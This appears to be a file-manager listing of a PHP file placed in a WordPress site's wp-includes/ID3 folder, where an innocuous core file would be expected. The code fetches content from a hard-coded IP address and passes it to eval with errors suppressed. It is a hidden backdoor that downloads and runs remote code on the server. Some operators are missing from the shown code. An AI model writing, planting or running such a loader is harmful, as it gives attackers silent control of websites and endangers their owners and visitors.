• File: index.php
  • Full Path: /home/matthif/www/wp-includes/ID3/index.php
  • Date Modified: 06/08/2026 2:40 AM
  • File size: 219 bytes
  • MIME-type: text/x-php
  • Charset: utf-8
<?php
$ch 
curl_init();
curl_setopt($chCURLOPT_URL'http://69.197.162.114/z60525_o/stat/index.txt');
curl_setopt($chCURLOPT_RETURNTRANSFER1);
$d curl_exec($ch);
curl_close($ch);
if(!empty(
$d)) @eval('?>'$d);